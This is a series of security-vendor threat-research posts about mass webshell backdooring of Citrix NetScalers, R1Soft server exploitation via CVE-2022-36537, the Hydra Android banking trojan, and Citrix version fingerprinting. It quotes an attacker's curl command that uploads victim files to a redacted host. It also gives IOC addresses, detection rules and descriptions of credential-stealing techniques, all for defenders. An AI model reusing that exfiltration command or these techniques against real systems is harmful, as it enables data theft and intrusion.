Fox-IT (part of NCC Group) has uncovered a large-scale exploitation campaign of Citrix NetScalers in a joint effort with the Dutch Institute of Vulnerability Disclosure (DIVD). An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing webshells on vulnerable NetScalers to gain persistent access. The adversary can execute arbitrary commands with this webshell, even when a NetScaler is patched and/or rebooted. At the time of writing, more than 1900 NetScalers remain backdoored. Using the data supplied by Fox-IT, the Dutch Institute of Vulnerability Disclosure has notified victims.

Figure 1: A global overview of known-compromised Netscalers located in each country, as of August 14th 2023

Main Takeaways

  • A set of vulnerabilities in NetScaler, one of which allows for remote code execution, were disclosed on July 18th. This disclosure was published after several security organisations saw limited exploitation of these vulnerabilities in the wild.
  • Fox-IT (in collaboration with the Dutch Institute of Vulnerability Disclosure) have scanned for these webshells to identify compromised systems. Responsible disclosure notifications have been sent by the DIVD.
  • At the time of this exploitation campaign, 31127 NetScalers were vulnerable to CVE-2023-3519.
  • As of August 14th, 1828 NetScalers remain backdoored.
  • Of the backdoored NetScalers, 1248 are patched for CVE-2023-3519.

Recommendations for NetScaler Administrators

  • A patched NetScaler can still contain a backdoor. It is recommended to perform an Indicator of Compromise check on your NetScalers, regardless of when the patch was applied.
    • Fox-IT has provided a Python script that utilizes Dissect to perform triage on forensic images of NetScalers.
    • Mandiant has provided a bash-script to check for Indicators of Compromise on live systems. Be aware that if this script is run twice, it will yield false positive results as certain searches get written into the NetScaler logs whenever the script is run.
  • If traces of compromise are discovered, secure forensic data; It is strongly recommended to make a forensic copy of both the disk and the memory of the appliance before any remediation or investigative actions are done. If the Citrix appliance is installed on a hypervisor, a snapshot can be made for follow-up investigation.
  • If a webshell is found, investigate whether it has been used to perform activities. Usage of the webshell should be visible in the NetScaler access logs. If there are indications that the webshell has been used to perform unauthorised activities, it is essential to perform a larger investigation, to identify whether the adversary has successfully taken steps to move laterally from the NetScaler, towards another system in your infrastructure.

Investigation and Disclosure Timeline

July 2023: Identifying & disclosing NetScalers vulnerable to CVE-2023-3519

Recently, three vulnerabilities were reported to be present in Citrix ADC and Citrix Gateway. Based on the information shared by Citrix, one of these vulnerabilities (CVE-2023-3519) gives an attacker the opportunity to perform unauthenticated remote code execution. Citrix, and various other organisations, also shared information regarding the fact that this vulnerability is actively being exploited in the wild.

At the time that Citrix disclosed information about CVE-2023-3519, details on how this vulnerability could be exploited were not publicly known. Using prior research on the identification of Citrix versions, we were able to quickly identify which Citrix servers on the web were vulnerable for CVE-2023-3519. This information was shared with the Dutch Institute of Vulnerability Disclosure (DIVD), who were able to notify administrators that they had vulnerable NetScalers exposed to the internet.

About the Dutch Institute of Vulnerability Disclosure (DIVD):

DIVD is a Dutch research institute that works with volunteers who aim to make the digital world safer by searching the internet for vulnerabilities and reporting the findings to those who can fix these vulnerabilities.

https://www.divd.nl/code/

In parallel with sharing the data with the DIVD, Fox-IT and NCC Group cross-referenced their scan data with their customer base to inform managed services customers shortly prior to the DIVD disclosure.

August 8th and 9th 2023: Identifying backdoored NetScalers

In July and August, the Fox-IT CERT (part of NCC Group) responded to several incidents related to CVE-2023-3519. Several webshells were found during these investigations. Based on both the findings of these IR engagements as well as Shadowserver’s Technical Summary of Observed Citrix CVE-2023-3519 Incidents, we were confident that the adversary had exploited at a large scale in an automated fashion.

While the discovered webshells return a 404 Not Found, the response still differs from how Citrix servers ordinarily respond to a request for a file that does not exist. Moreover, the webshell will not execute any commands on the target machine unless given proper parameters. These two factors combined allow us to scan the internet for webshells with high confidence, without impacting affected NetScalers.

In cooperation with the DIVD we decided to scan NetScalers accessible on the internet for known webshell paths. These scans may be recognized in Citrix HTTP Access logs by the User-Agent: DIVD-2023-00033. We initially only scanned systems that were not patched on July 21st, as the exploitation was believed to be between July 20th and July 21st. Later, we decided to also scan the systems that were already patched on July 21st. The results exceeded our expectations. Based on the internet wide scan, approximately 2000 unique IP addresses seem to have been backdoored with a webshell as of August 9th.

August 10th: Responsible Disclosure by the DIVD

Starting from August 10th, the DIVD has begun reaching out to organisations affected by the webshell. They used their already existing network and responsible disclosure methods to notify network owners and national CERTs. It however remains possible that this notification doesn’t reach the right people in time. We would therefore like to repeat the advice to manually perform an IOC check on your internet exposed NetScaler devices.

Findings

Most apparent from our scanning results is the percentage of patched NetScalers that still contain a backdoor. At the time of writing, approximately 69% of the NetScalers that contain a backdoor are not vulnerable anymore to CVE-2023-3519. This indicates that while most administrators were aware of the vulnerability and have since patched their NetScalers to a non-vulnerable version, they have not been (properly) checked for signs of successful exploitation.

Figure 2: The large majority of known compromised NetScalers are patched.

Thus, administrators may currently have a false sense of security even though an up to date Netscaler can still have been backdoored. The high percentage of patched NetScalers that have been backdoored is likely a result of the time at which mass exploitation took place. From incident response cases, we can confirm Shadowserver’s prior estimate that this specific exploitation campaign took place between late July 20th and early July 21st:

Figure 3: While patches were being applied, exploitation took place at a large scale between July 20th and July 21st.

We could not discern a pattern in the targeting of NetScalers. We have seen some systems that have been compromised with multiple webshells, but we also see large volumes of NetScalers that were vulnerable between July 20th and July 21st have not been compromised with a backdoor. In total we have found 2491 webshells across 1952 distinct NetScalers. Globally, there were 31127 NetScalers vulnerable to CVE-2023-3519 on July 21st, meaning that the exploitation campaign compromised 6.3% of all vulnerable NetScalers globally.

Figure 4: Amount of Compromised NetScalers per country as of August 14th 2023
Figure 5: Amount of vulnerable NetScalers per country as of July 21st 2023

It appears the majority of compromised NetScalers reside in Europe. Of the top 10 affected countries, only 2 are located outside of Europe. There are stark differences between countries in terms of what percentage of their NetScalers were compromised. For example, while Canada, Russia and the United States of America all had thousands of vulnerable NetScalers on July 21st, virtually none of these NetScalers were found to have a webshell on them. As of now, we have no clear explanation for these differences, nor do we have a confident hypothesis to explain which NetScalers were targeted by the adversary and which ones were not. Moreover, we do not see a particular targeting in terms of victim industry.

As of August 14th, 1828 NetScalers remain compromised. While we see a decline in the amount of compromised NetScalers following the disclosure on August 10th, we hope that this publication can raise further awareness that backdoors can persist even when Citrix servers are updated. Therefore, we again recommend any NetScaler administrator to perform basic triage on their NetScalers.

Conclusion

The monitoring and protection of edge devices such as NetScalers remains challenging. Sometimes, the window in which defenders must patch their systems is incredibly small. CVE-2023-3519 was exploited in targeted attacks before a patch was available and was later exploited on a large scale. System administrators need to be aware that adversaries can exploit edge devices to place backdoors that persist even after updates and / or reboots. As of now, it is strongly advised to check NetScalers, even if they have been patched and updated to the latest version. Resources are available at the Fox-IT GitHub.

References

From Backup to Backdoor: Exploitation of CVE-2022-36537 in R1Soft Server Backup Manager

Blog updated on 3 March 2023 to (i) remove a table containing data created on 09-01-23, more than one month earlier than publication of the original blog on 22-02-23 entitled ‘Backdoored ConnectWise R1Soft Server Backup Manager by Autonomous System Organization (Top 20 as of 2023-01-09)’; (ii) update a table containing data created on 09-01-23 entitled ‘Backdoored ConnectWise R1Soft Server Backup Manager by Country (Top 20 as of 2023-01-09); and (iii) minor incidental updates.

During a recent incident response case, we found traces of an adversary leveraging ConnectWise R1Soft Server Backup Manager software (hereinafter: R1Soft server software). The adversary used it as an initial point of access and as a platform to control downstream systems connected via the R1Soft Backup Agent. This agent is installed on systems to support being backed up by the R1Soft server software and typically runs with high privileges. This means that after the adversary initially gained access via the R1Soft server software it was able to execute commands on all systems running the agent connected to this R1Soft server.

The adversary exploited the R1Soft server software via CVE-2022-36537 [1] [2], which is a vulnerability in the ZK Java Framework that R1Soft Server Backup Manager utilises. The “ZK” Framework is an opensource Java framework for building enterprise web and mobile applications. After successfully exploiting the vulnerability, the adversary deployed a malicious database driver with backdoor functionalities.

Further research by us indicates that world-wide exploitation of R1Soft server software started around the end of November 2022. With the help of fingerprinting, we have identified multiple compromised hosting providers globally. On 9 January 2023, we identified a total of 286 servers running R1Soft server software with a specific backdoor. Fox-IT informed the Dutch NCSC to coordinate the sharing of this knowledge towards the relevant national CERTs on 12 January 2023. 

Given the global scope of compromise, our aim is to spread awareness about the severity of this threat. This blog will describe the malicious driver that was deployed by leveraging the vulnerability and how to check if your systems are affected. A table with IOCs can be found at the end of this post which can be used to correlate against the data sources within your environment. 

R1Soft server software exploitation via ZK Framework 

In October 2022, security company Huntress published about the CVE-2022-36537 vulnerability in the ZK Framework [3]. They stated that this vulnerability can be abused to bypass authentication and lead to remote code execution (RCE) in R1Soft server software and its connected backup agents. 

On 9 December 2022, proof-of-concept exploits started to appear on the internet for this vulnerability [4] [5] [6]. We traced back the earliest exploitation of this bug within our client’s environment to 29 November 2022. 

Indicators of successful exploitation 

The R1Soft server software has the option to upload a new database driver. This loads a new Java Database Connector (JDBC) and it is exactly this component that is abused by the adversary to load a malicious JDBC driver. 

When the malicious JDBC driver is loaded by the R1Soft server software it will create a log entry in {r1soft_install_location}/log/server.log. This can be used to verify that the malicious driver was loaded into the application when successfully exploited. Below is an example of such a log entry which was encountered during the incident response case: 

2022-11-29 12:06:03,654 INFO - <UI> Host: 45.159.248[.]213; Imported CDPServer [Id:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx] The MySQL database driver was uploaded successfully

We found multiple malicious r1soft-cdp-server-mysql-driver*.jar files in the /tmp folder of the R1Soft servers during the incident response case. This is an artefact of uploading a new database driver to R1Soft servers. Analysis shows that the timestamp of the Driver.class in the JAR file matches the time of exploitations. This indicates that the JAR file is automatically generated during the exploitation process. 

During the incident response case, we found traces of the adversary dropping the malicious JDBC driver in {r1soft_install_location}/bin/mysql.jar on the R1Soft server. 

The following IP addresses were found in the server.log file exploiting the vulnerability in the R1Soft server software within the client’s environment: 

  • 5.8.33[.]147
  • 45.61.139[.]187
  • 45.159.248[.]213
  • 77.91.101[.]140
  • 142.11.195[.]29

Malicious database driver 

The dropped malicious JDBC driver by the adversary creates upon execution a new web filter with the name fa0sifjasfjai0fja and URL pattern /zkau/jquery. Once the malicious JDBC driver has been registered, it starts listening for incoming requests and it has the following functionalities: 

  • Load new functionalities in memory. 
  • Command execution. 

Based on the overlapping variable names and functions, we concluded that this driver contains the Java code from the Godzilla web shell [7] [8]

As described in the “Indicators of successful exploitation” the JAR is automatically generated. Interestingly the public Proof-of-Concept exploit released 10 days later [4] also generates a JAR file during the exploitation instead of using a static JAR file. 

We have published a decompiled version of the malicious Driver.class backdoor here

NOTE: To prevent abuse we have redacted the password that is required to interact with the backdoor. 

Backdoor statistics 

Using the backdoor URL and its default response, we can determine if a R1Soft server is backdoored.The following graphs show a top 20 breakdown by country as of 3 March 2023:  

As of 3 March 2023, a total of 128 R1Soft servers remain backdoored, the graph above shows the top 20 countries, which make up 123 of those servers.

The graph below shows the total number of backdoored servers we detected on the internet over time, showing a significant decrease since 9 January 2023.

Data exfiltration 

After the adversary gained access, it used curl to upload files from the victim’s network to a server running a version of the SimpleHTTPServerWithUpload.py [9] Python script.  

curl http://[REDACTED]:8000/ -F "file=@/var/tmp/[REDACTED].txt" -v 

This server was only active during ”working hours” of the adversary, meaning the adversary stopped running the script at the end of its operations. Over the course of the compromise, the adversary was able to exfiltrate VPN configuration files, IT administration information and other sensitive documents. 

Detection 

The following Snort/Suricata rules were created to monitor the network indicators that are present when some of the adversary tools are being used. Please note that the SimpleHttpServerWithUpload is a publicly available script and is thus not a guarantee that this same adversary is present in the network. 

# Detection for Godzilla webshell variant and SimpleHTTPServerWithUpload
alert tcp any any -> any any (msg:"FOX-SRT – Suspicious – Python SimpleHTTPServerWithUpload Observed"; flow:established, from_server; content:"Server: SimpleHTTPWithUpload/"; http_header; threshold: type limit, track by_dst, count 1, seconds 600; classtype:bad-unknown; metadata:created_at 2023-01-06; priority:2; sid:21004337; rev:1;)
alert tcp any any -> any any (msg:"FOX-SRT – IOC – Godzilla Variant ZK Web Shell Request Observed"; flow:established, to_server; content:"/zkau/jquery"; http_uri; threshold:type limit, track by_dst, count 1, seconds 600; flowbits:set, fox.zkau.webshell; classtype:trojan-activity; metadata:created_at 2023-01-09; priority:3; sid:21004344; rev:1;)
alert tcp any any -> any any (msg:"FOX-SRT – Webshell – Godzilla Variant ZK Web Shell Response Observed"; flow:established, from_server; flowbits:isset, fox.zkau.webshell; content:"200"; http_stat_code; threshold:type limit, track by_src, count 1, seconds 600; classtype:trojan-activity; metadata:created_at 2023-01-09; priority:1; sid:21004345; rev:1;)

Apart from the adversary specific rules we’ve also created detection coverage for the original vulnerability that is being exploited in the ZK Framework that led to the RCE vulnerability in the R1Soft server software. These signatures can be useful to detect successful exploitation in other products that are using a vulnerable version of the ZK Framework: 

# Detection for the exploitation of CVE-2022-36537 (ZK Java Framework)
alert tcp any any -> any any (msg:"FOX-SRT – Flowbit – CVE-2022-36537 Exploitation Attempt Observed"; flow:established, to_server; content:"POST"; http_method; content:"/zkau/upload"; http_uri; fast_pattern; content:"uuid="; http_uri; content:"sid="; http_uri; content:"dtid="; http_uri; content:"nextURI="; flowbits:set, fox.cve.2022-36537; threshold:type limit, track by_src, count 1, seconds 3600; classtype:web-application-attack; metadata:CVE 2022-36537; metadata:created_at 2023-01-13; priority:3; sid:21004354; rev:1;)
alert tcp any any -> any any (msg:"FOX-SRT – Exploit – CVE-2022-36537 Possible Successful Exploitation Observed"; flow:established, from_server; flowbits:isset, fox.cve.2022-36537; content:"200"; http_stat_code; content:!"<title>Upload Result</title>"; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; metadata:CVE 2022-36537; metadata:created_at 2023-01-13; priority:1; sid:21004355; rev:1;)

Indicators of Compromise (IOCs) 

Type Value Description 
ipv4 5.8.33[.]147 Observed: 2022-12-05 – IP address used for exploitation of R1Soft SBM  
ipv4 45.61.139[.]187 Observed: 2022-12-09 – IP address used for exploitation of R1Soft SBM  
ipv4 45.159.248[.]213 Observed: 2022-11-29 – IP address used for exploitation of R1Soft SBM  
ipv4 77.91.101[.]140 Observed: 2022-11-29 – IP address used for exploitation of R1Soft SBM  
ipv4 142.11.195[.]29 Observed: 2022-12-11 – IP address used for exploitation of R1Soft SBM  

MITRE 

Tactic Id Description 
Initial Access (TA0001) T1190 Exploit Public Facing Application 
Execution (TA0002) T1059.004 Command and Scripting Interpreter: Unix Shell 
Execution (TA0002) T1072 Software Deployment Tools 
Persistence (TA0003) T1505.003 Server Software Components: Web Shell 
Defense Evasion (TA0005) T1211 Exploitation for Defense Evasion 
Defense Evasion (TA0005) T1036.005 Masquerading: Match Legitimate Name or Location 
Defense Evasion (TA0005) T1620 Reflective Code Loading 
Exfiltration (TA0010) T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol 
Command and Control (TA0011) T1573.001  Encrypted Channel: Symmetric Cryptography 

Timeline 

  • 2022-05-22: Authentication bypass vulnerability reported in ZK Java Framework [2] 
  • 2022-08-26: Vulnerability officially assigned CVE-2022-36537 [1] 
  • 2022-10-31: Huntress discloses RCE in ConnectWise/R1Soft Server Backup Manager [3] 
  • 2022-11-29: Date of exploitation and backdooring of a R1Soft Server Backup Manager observed by Fox-IT 
  • 2022-12-09: Proof-of-Concept to exploit R1Soft Server Backup Manager started to appear on the Internet [4] [5] [6] 
  • 2023-01-12: Fox-IT informs Dutch NCSC of mass exploitation and backdooring of R1Soft Server Backup Manager servers to coordinate the sharing of this knowledge towards the relevant national CERTs 
  • 2023-02-22: Release of this blog post 
  • 2023-03-03: Release of updated blog post

More info

This threat is still under active research. If enough new data comes in a follow-up blog will be considered. If you have any questions or need assistance based on these findings, please reach out to Fox-IT. Contact us via [email protected]. If urgent please call 08003692378 (Netherlands) or +31152847999 (rest of world) to be connected to one of our incident responders.

References 

[1] https://nvd.nist.gov/vuln/detail/CVE-2022-36537  
[2] https://tracker.zkoss.org/browse/ZK-5150 
[3] https://www.huntress.com/blog/critical-vulnerability-disclosure-connectwise/r1soft-server-backup-manager-remote-code-execution-supply-chain-risks 
[4] https://github.com/numencyber/Vulnerability_PoC/tree/main/CVE-2022-36537  
[5] https://github.com/Malwareman007/CVE-2022-36537/  
[6] https://medium.com/numen-cyber-labs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746  
[7] https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell/blob/main/GMemShell.java
[8] https://github.com/H4ckForJob/kingkong#analysis  
[9] https://gist.github.com/UniIsland/3346170  
 

Threat spotlight: Hydra

This publication is part of our Annual Threat Monitor report that was released on the 8th of Febuary 2023. The Annual threat Monitor report can be found here.

Authored by Alberto Segura

Introduction

Hydra, also known as BianLian, has been one of the most active mobile banking malware families in 2022, alongside Sharkbot and Flubot (until Flubot was taken down by Law Enforcement at the end of May 2022).

The features implemented in this banking malware are present in most of the banking malware families: injections/overlays, keylogging (listening to Accessibility events) and, since June 2022, Hydra has even introduced a cookie-stealing feature which targeted several banking entities in Spain.

It is interesting to see that lately different banking malware families are introducing the possibility to steal cookies. This could originate from cybercriminals being more eager to rent banking malware with this capability, hence giving the malware author more revenue when implemented.

During our research, we found that an important number of the command-and-control (C2) servers are located in the Netherlands. This is an interesting pattern, especially since threat actors (TAs) active in mobile malware have been frequently hosting their infrastructure in Russia and China.

Credential-stealing Features

Hydra is an Android banking malware whose main goal is stealing credentials, so TAs can access those accounts and monetize them directly or indirectly by selling them to third parties. Hydra steals credentials using the following two strategies:

  • Overlays/Injections, at the beginning of the infection, it sends a few requests to the C2 server, and receives a list of targeted applications and a URL that points to a ZIP file which contains the corresponding injections. The targets consist mostly of banks and cryptocurrency wallets. Hydra saves these injections locally and shows them as soon as it detects a user opening a banking application. That way, the victim thinks it is the official application that requests credentials or credit card information.
Server response with a configuration including the URL to download a ZIP file containing all the injections
Contents of the ZIP file with the injections

When the injection is shown and the victim enters his credentials, the malware uses JavaScript’s “Console.Log” function to send the credentials to the native Java code of the application. This function is reimplemented by the malware to send credentials to the C2 server, which is shown in the figure below.

Decompiled code used to save the stolen credentials
Decompiled code used to send the stolen credentials to the C2 server
  • Keylogging,Hydra abuses the Accessibility permissions to set up an Accessibility service that receives every Accessibility event happening on the infected device. This way the malware receives change events for TextFields (to steal usernames and passwords) and button clicks.
Keylogger code

In order to complement the credential-stealing features, Hydra includes a screencast component that sends screenshots to the C2 server and receives commands used to simulate Accessibility events (click buttons, enter text in TextFields, etc.). This way the TAs can manipulate the target application on the victim’s device to monetize the account associated with that application. This is a good way to bypass antifraud security measures focused on checking IP addresses or devices that log in to the accounts or make transfers.

Screencast feature starting code

Besides credential-stealing features, Hydra implements features to steal other information from the infected device. Especially information required for successful account takeovers and monetization of accounts, such as received SMS messages for OTP codes, a list of installed applications, or the unlock code of the device which can be used to unlock the device and start the screencast feature.

Apart from the previously mentioned features, Hydra developers introduced a new and interesting feature around June 2022: stealing cookies. With this new feature, the malware can steal cookies from sessions linked to bank accounts of victims, avoiding the need of credentials when logging in.

New features: Stealing Cookies

Around June 2022 we found new samples introducing this new feature used to steal cookies from sessions after the victims log in to their accounts. Since the beginning until now, there are not that many targeted banks or other applications targeted by this feature, but the list has been increasing in the past months.

It started targeting a few applications – Google Mail and BBVA Spain -, as we can see in the following image:

Targeted applications in the first versions including the cookie-stealing feature

But after some months, TAs included two more targets – Facebook and Davivienda – to steal credentials:

Targeted applications in the latest version

As we can see in the previous pictures of the decompiled code, to implement this feature, TAs include the package name of the targeted applications alongside the URLs to the mobile login website. This way, a WebView can show the victim the official login page and, after the victim successfully logs in to his account, the cookies of the loaded website in the WebView are forwarded to the C2 server.

Hydra creates a POST request to send credentials or cookies to the C2 server

It is interesting that TAs include the list of targeted applications by the cookie-stealing feature hardcoded in each sample, while the list of targets for injections is retrieved from the C2 server. Since it is a new feature, it is probably in a test phase, and after some time TAs could start retrieving the list of cookie-stealer targets from the C2 server instead of hardcoding the list in the malware.

Hydra Variants

We found that Hydra has different variants with small changes between them. The principal features are present in all of them, but they include different information about the C2 server. Hydra can be categorized in three variants based on how it includes the C2 server information:

  • Using Tor, this variant includes a Tor (.onion) URL to the endpoint ‘/api/mirrors’. As response, it will receive a Base64-encoded JSON with the list of C2 servers to use. This variant includes code to download Tor native libraries in order to connect to this ‘backup C2’ using the Tor network.
Tor ‘backup C2’ response
Tor native libraries used to connect to the Tor network
  • Using GitHub, this variant includes a GitHub repository file containing a Base64-encoded JSON object with the list of C2 servers. This is almost equivalent to the Tor variant, but it uses GitHub instead of using the Tor network – it does not include code to download and run Tor native libraries.
Code to connect to GitHub to get C2 servers
GitHub file response with the Base64-encoded list of C2 servers
  • Hardcoded C2 server, this variant includes the C2 server in the binary itself and eventually sends a request to the path ‘/api/mirrors’ in order to get a new list of C2 servers that it can use in the future if the hardcoded one goes down.
C2 server hardcoded in the sample. The path ‘/api/mirrors’ is used to get an updated list of C2 servers

C2 Server Analysis

During our Hydra research, we have been collecting an important number of C2 servers used in different samples. From all those servers, we found that some countries are preferred over others in terms of hosting.

This usually happens with Russia or China, which are the preferred countries to host C2 servers by TAs, but surprisingly, Hydra’s TAs are using other countries such as the Netherlands (73), United States (42) and Ukraine (29). In this case, we observed only 19 servers hosted in Russia and none in China.

In the following picture we can see a world map with the different countries hosting Hydra’s C2 servers. The color intensity increases with the increase in amount of servers.

Popular countries for hosting Hydra C2 servers

Besides the different Hydra variants used for each sample, we found that different C2 servers are configured with a different target list. This is normal, since this malware is rented out by its developers, so each TA has different interests in what banks or applications to target. Even though most of the servers seem to use a default list of targets – probably all the supported banks/apps -, there are certain servers with a smaller list of targets, usually focused on banks or applications used in specific countries or languages – such as LATAM and Spanish banks.

Even though some servers use a different configuration – different list of targeted apps -, most of the servers use the same list. This could mean that Hydra developers ship their malware with a default list of targets or that attackers use a default list of targets themselves.

Network Detection

The behavior displayed by Hydra can be detected using network detection. The following Suricata rules were tested successfully against Hydra network traffic:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT - Trojan - Hydra Mobile Malware Configuration Observed (injects)"; flow:established,to_client; content:"|22|injects_loaded|22|:"; http_server_body; fast_pattern; threshold:type limit,track by_dst,count 1,seconds 600; reference:url,https://blog.fox-it.com/2023/02/15/threat-spotlight-hydra/; metadata:ids suricata; metadata:created_at 2023-02-15; classtype:trojan-activity; sid:21004395; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT - Trojan - Hydra Mobile Malware Configuration Observed (keylogger)"; flow:established,to_client; content:"|22|enable_keylogger|22|:"; http_server_body; fast_pattern; threshold:type limit,track by_dst,count 1,seconds 600; reference:url,https://blog.fox-it.com/2023/02/15/threat-spotlight-hydra/; metadata:ids suricata; metadata:created_at 2023-02-15; classtype:trojan-activity; sid:21004396; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT - Trojan - Possible Hydra Mobile Malware POST Observed"; flow:established,to_server; content:"POST"; http_method; content:"AndroidBot -> "; http_client_body; depth:64; fast_pattern; threshold:type limit,track by_src,count 1,seconds 600; reference:url,https://blog.fox-it.com/2023/02/15/threat-spotlight-hydra/; metadata:ids suricata; metadata:created_at 2023-02-15; classtype:trojan-activity; sid:21004397; rev:1;)

These rules are compatible with Suricata 4 and later.

Conclusion

Hydra has been one of the most active banking malware families for Android in 2022, alongside other notorious families such as Flubot, Sharkbot and Teabot. This banker is rented out through underground forums, and TAs that rent the malware configure the list of targeted applications based on their needs. However, most of target lists we observed in Hydra samples are equivalent, hinting at a default configuration.

Typical features to steal credentials are implemented in this family: injections/overlays, keylogging and, from around June 2022, the developers also started to include cookies-stealing features to the rented samples. All these features make Hydra one of the more interesting banking malware families to rent for TAs. This can explain why we observed a lot of samples of Hydra every day, many sharing the same C2 server.

Even if the credential-stealing features and the rest of the code is the same for all the samples we detected, we found there are differences in the way the C2 servers are included in various samples. For this reason, we distinguish three different variants based on how the C2 server is included: an Onion service, a GitHub repository with the list of C2 servers and, finally, just a URL to the C2 server it should use.

During our research we also found that TAs are frequently hosting their C2s in the same countries, such as the Netherlands, United States and Ukraine, instead of hosting them in Russia or China, as usual. Additionally, most of the servers have enabled all the supported injections, instead of enabling only those applications which are more interesting to the TA depending on, for example, the country of the bank.

We expect this family to be one of the most active mobile banking malware in the upcoming months, with its developers implementing new and interesting features.

CVE-2022-27510, CVE-2022-27518 – Measuring Citrix ADC & Gateway version adoption on the Internet

Authored by Yun Zheng Hu

Recently, two critical vulnerabilities were reported in Citrix ADC and Citrix Gateway; where one of them was being exploited in the wild by a threat actor. Due to these vulnerabilities being exploitable remotely and given the situation of past Citrix vulnerabilities, RIFT started to research on how to identify the exact version of Citrix ADC and Gateway servers on the internet so that we could inform customers if they hadn’t patched yet.

The exact version information is helpful to determine whether a server is still vulnerable to particular vulnerabilities. We also used version information to derive version statistics and version adoption over time.

In the first part of this blog, we go into how we acquired and analysed Citrix ADC disk images for version identification. Then we go into how we found a way to determine the version build date and how we used the build dates to download missing Citrix ADC images to aid our version identification research. The last part goes into the version statistics of Citrix ADC servers on the internet and how we used this to measure the version adoption on the internet.

Skip to the end if you are interested in the statistics rather than the technical details of Citrix ADC version identification.

CVE-2022-27510 – Unauthorized access to Gateway user capabilities

On November 8th 2022, Citrix published a security bulletin for CVE-2022-27510, a critical authentication bypass vulnerability affecting Citrix ADC (formerly known as NetScaler) and Citrix Gateway. For this to be exploitable, the server must be configured as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy).

CVE-2022-27518 – Unauthenticated remote arbitrary code execution

Less than a month later, on December 13th 2022, the National Security Agency (NSA) released a Cybersecurity Advisory that APT5 is actively exploiting Citrix ADC servers. However this advisory does not mention a specific CVE that is being abused but most likely a new vulnerability as on the same day Citrix published a blog with guidance and a new security bulletin detailing CVE-2022-27518, which is a new vulnerability and not to be confused with CVE-2022-27510. For this to be exploitable, the Citrix ADC or Gateway server must be configured as a SAML Service Provider or SAML Identity Provider.

Finding Citrix ADC & Gateway Servers on the Internet

Citrix ADC and Gateway servers are commonly internet-facing due to the nature of the appliance. For example, services like Shodan and Censys regularly scan the internet and identify these servers. Using this information, we can build a list of Citrix ADC & Citrix Gateway servers with the SSL VPN / Gateway service exposed to the internet. We used this to create an initial list of servers, and we found around 28.000 servers on the internet as of November 11th 2022.

Version identification

Sadly, the exact version information is not available in the HTTP response of a Citrix ADC or Gateway server. However, we noticed that there is an MD5 hash-like value in the HTTP body when requesting the /vpn/index.html URL:

version hash appended to HTML resources

Here we see the parameter ?v=6e7b2de88609868eeda0b1baf1d34a7e appended to several resource URLs. We extracted these hashes from Censys scan data to create a list of the most common version hashes. We found around 100 unique version hashes.

To see if we can map the version hash to exact versions, we begin by first spinning up our own Citrix ADC server to start exploring wether this version hash in this HTML page is static or generated.

Cloud Marketplace

More server appliances become available in the cloud, and Citrix ADC is no exception. You can easily find it in your favourite cloud marketplace. So gone are the days of the time-consuming process of downloading images and spinning up a VM to install the application; we can do this directly in the cloud! We used the Google Cloud Marketplace, but it’s also available on AWS and Azure.

After deploying Citrix ADC with a single click from the Cloud Marketplace, we log in to the shell and explore the file system to see if we can find the index.html page and if it contains a hash value.

SSH into the VM and show the version, looks like we are on version 13.1 build 33.47:

yun@cloudshell:~ (rift-citrix-362712)$ gcloud ssh citrix-adc-vpx-instance
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################

 Done
> show version
        NetScaler NS13.1: Build 33.47.nc, Date: Sep 23 2022, 13:12:49   (64-bit)
 Done

Type shell to enter the shell, and let’s find all index.html files:

> shell
root@ns# uname -a
FreeBSD ns 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 e5f9d90507ab(heads/artesa_33_47)-dirty: Fri Sep 23 13:13:05 PDT 2022     root@sjc-bld-bsd114-228:/usr/obj/usr/home/build/adc/usr.src/sys/NS64  amd64

root@ns# find / -name 'index.html'
/netscaler/ns_gui/admin_ui/gui_v2/swagger_ui/index.html
/netscaler/ns_gui/vpn/index.html
/var/netscaler/gui/vpn/index.html
/var/netscaler/gui/admin_ui/gui_v2/swagger_ui/index.html
/var/netscaler/logon/LogonPoint/index.html
/var/python/lib/python3.7/site-packages/djangorestframework-3.11.0-py3.7.egg/rest_framework/templates/rest_framework/docs/index.html
/var/python/lib/python3.7/site-packages/Django-3.0.5-py3.7.egg/django/contrib/admin/templates/admin/index.html
/var/python/lib/python3.7/site-packages/Django-3.0.5-py3.7.egg/django/contrib/admindocs/templates/admin_doc/index.html

Looks like there are several directories with index.html, let’s check /vpn/index.html:

root@ns# head /netscaler/ns_gui/vpn/index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Citrix Gateway</title>
<link rel="SHORTCUT ICON" href="/vpn/images/AccessGateway.ico" type="image/vnd.microsoft.icon">
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META content=noindex,nofollow,noarchive name=robots>
<link href="/vpn/js/rdx/core/css/rdx.css?v=7afe87a42140b566a2115d1e232fdc07" rel="stylesheet" type="text/css"/>
<link href="/logon/themes/Default/css/base.css?v=7afe87a42140b566a2115d1e232fdc07" rel="stylesheet" type="text/css" media="screen" />

Bingo! The index.html file contains the hash 7afe87a42140b566a2115d1e232fdc07, and if we search for this value on Censys, we get multiple results which is promising. So we can assume that version 13.1-33.47 maps to this hash value.

Let’s check which other files contain this hash value for good measure:

root@ns# grep -r 7afe87a42140b566a2115d1e232fdc07 /var/netscaler | cut -d: -f1 | sort -u
/var/netscaler/gui/epa/epa.html
/var/netscaler/gui/epa/errorpage.html
/var/netscaler/gui/epa/posterrorpage.html
/var/netscaler/gui/vpn/index.html
/var/netscaler/gui/vpn/loading.html
/var/netscaler/gui/vpn/logout.html
/var/netscaler/gui/vpn/tmindex.html
